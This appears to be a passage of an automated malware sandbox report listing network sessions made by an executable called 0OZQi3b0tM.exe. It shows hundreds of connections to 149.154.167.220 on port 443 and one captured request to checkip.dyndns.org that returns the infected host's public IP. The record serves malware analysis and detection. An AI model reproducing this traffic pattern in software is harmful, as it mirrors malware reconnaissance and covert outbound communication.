                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            218192.168.2.550128149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            219192.168.2.550129149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            22192.168.2.549790149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            220192.168.2.550130149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            221192.168.2.550131149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            222192.168.2.550132149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            223192.168.2.550133149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            224192.168.2.550134149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            225192.168.2.550135149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            226192.168.2.550136149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            227192.168.2.550137149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            228192.168.2.550138149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            229192.168.2.550140149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            23192.168.2.549791149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            230192.168.2.550141149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            231192.168.2.550142149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            232192.168.2.550143149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            233192.168.2.550144149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            234192.168.2.550145149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            235192.168.2.550146149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            236192.168.2.550147149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            237192.168.2.550148149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            238192.168.2.550149149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            239192.168.2.550150149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            24192.168.2.549792149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            240192.168.2.550151149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            241192.168.2.550152149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            242192.168.2.550153149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            243192.168.2.550154149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            244192.168.2.550155149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            245192.168.2.550156149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            246192.168.2.550158149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            247192.168.2.550159149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            248192.168.2.550160149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            249192.168.2.550161149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            25192.168.2.549793149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            250192.168.2.550162149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            251192.168.2.550163149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            252192.168.2.550164149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            253192.168.2.550165149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            254192.168.2.550166149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            255192.168.2.550167149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            256192.168.2.550168149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            257192.168.2.550169149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            258192.168.2.550170149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            259192.168.2.550171149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            26192.168.2.549794149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            260192.168.2.550174149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            261192.168.2.550177149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            262192.168.2.550180149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            263192.168.2.550183149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            264192.168.2.550185149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            265192.168.2.550188149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            266192.168.2.550192149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            267192.168.2.550195149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            268192.168.2.550197149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            269192.168.2.550200149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            27192.168.2.549795149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            270192.168.2.550203149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            271192.168.2.550205149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            272192.168.2.550206149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            273192.168.2.550207149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            274192.168.2.550208149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            275192.168.2.550209149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            276192.168.2.550210149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            277192.168.2.550211149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            278192.168.2.550212149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            279192.168.2.550213149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            28192.168.2.549796149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            280192.168.2.550214149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            281192.168.2.550215149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            282192.168.2.550216149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            283192.168.2.550217149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            284192.168.2.550218149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            285192.168.2.550219149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            286192.168.2.550220149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            287192.168.2.550221149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            288192.168.2.550222149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            289192.168.2.550223149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            29192.168.2.549798149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            290192.168.2.550224149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            291192.168.2.550225149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            292192.168.2.550226149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            293192.168.2.550227149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            294192.168.2.550228149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            295192.168.2.550229149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            296192.168.2.550230149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            297192.168.2.550231149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            298192.168.2.550232149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            299192.168.2.550233149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            3192.168.2.549771149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            30192.168.2.549799149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            300192.168.2.550234149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            301192.168.2.550235149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            302192.168.2.550236149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            303192.168.2.550237149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            304192.168.2.550238149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            305192.168.2.550239149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            306192.168.2.550240149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            307192.168.2.550241149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            308192.168.2.550242149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            309192.168.2.550243149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            31192.168.2.549801149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            310192.168.2.550244149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            311192.168.2.550245149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            312192.168.2.550247149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            313192.168.2.550248149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            314192.168.2.550249149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            315192.168.2.550250149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            316192.168.2.550251149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            317192.168.2.549746193.122.130.080C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            Jun 26, 2022 09:32:22.672653913 CEST282OUTGET / HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                            Host: checkip.dyndns.org
                            Connection: Keep-Alive
                            Jun 26, 2022 09:32:22.784780025 CEST283INHTTP/1.1 200 OK
                            Date: Sun, 26 Jun 2022 07:32:22 GMT
                            Content-Type: text/html
                            Content-Length: 106
                            Connection: keep-alive
                            Cache-Control: no-cache
                            Pragma: no-cache
                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 34 33 2e 36 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.143.61</body></html>


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            32192.168.2.549802149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            33192.168.2.549803149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            34192.168.2.549804149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            35192.168.2.549805149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            36192.168.2.549808149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            37192.168.2.549809149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            38192.168.2.549810149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            39192.168.2.549812149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            4192.168.2.549772149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            40192.168.2.549814149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            41192.168.2.549815149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            42192.168.2.549816149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            43192.168.2.549817149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            44192.168.2.549818149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            45192.168.2.549821149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            46192.168.2.549822149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            47192.168.2.549824149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            48192.168.2.549825149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            49192.168.2.549827149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            5192.168.2.549773149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            50192.168.2.549829149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            51192.168.2.549830149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            52192.168.2.549833149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            53192.168.2.549838149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            54192.168.2.549841149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            55192.168.2.549844149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            56192.168.2.549847149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            57192.168.2.549852149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            58192.168.2.549857149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            59192.168.2.549859149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            6192.168.2.549774149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            60192.168.2.549863149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            61192.168.2.549865149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            62192.168.2.549868149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            63192.168.2.549871149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            64192.168.2.549874149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            65192.168.2.549876149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            66192.168.2.549879149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            67192.168.2.549881149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            68192.168.2.549884149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            69192.168.2.549888149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            7192.168.2.549775149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            70192.168.2.549890149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            71192.168.2.549893149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


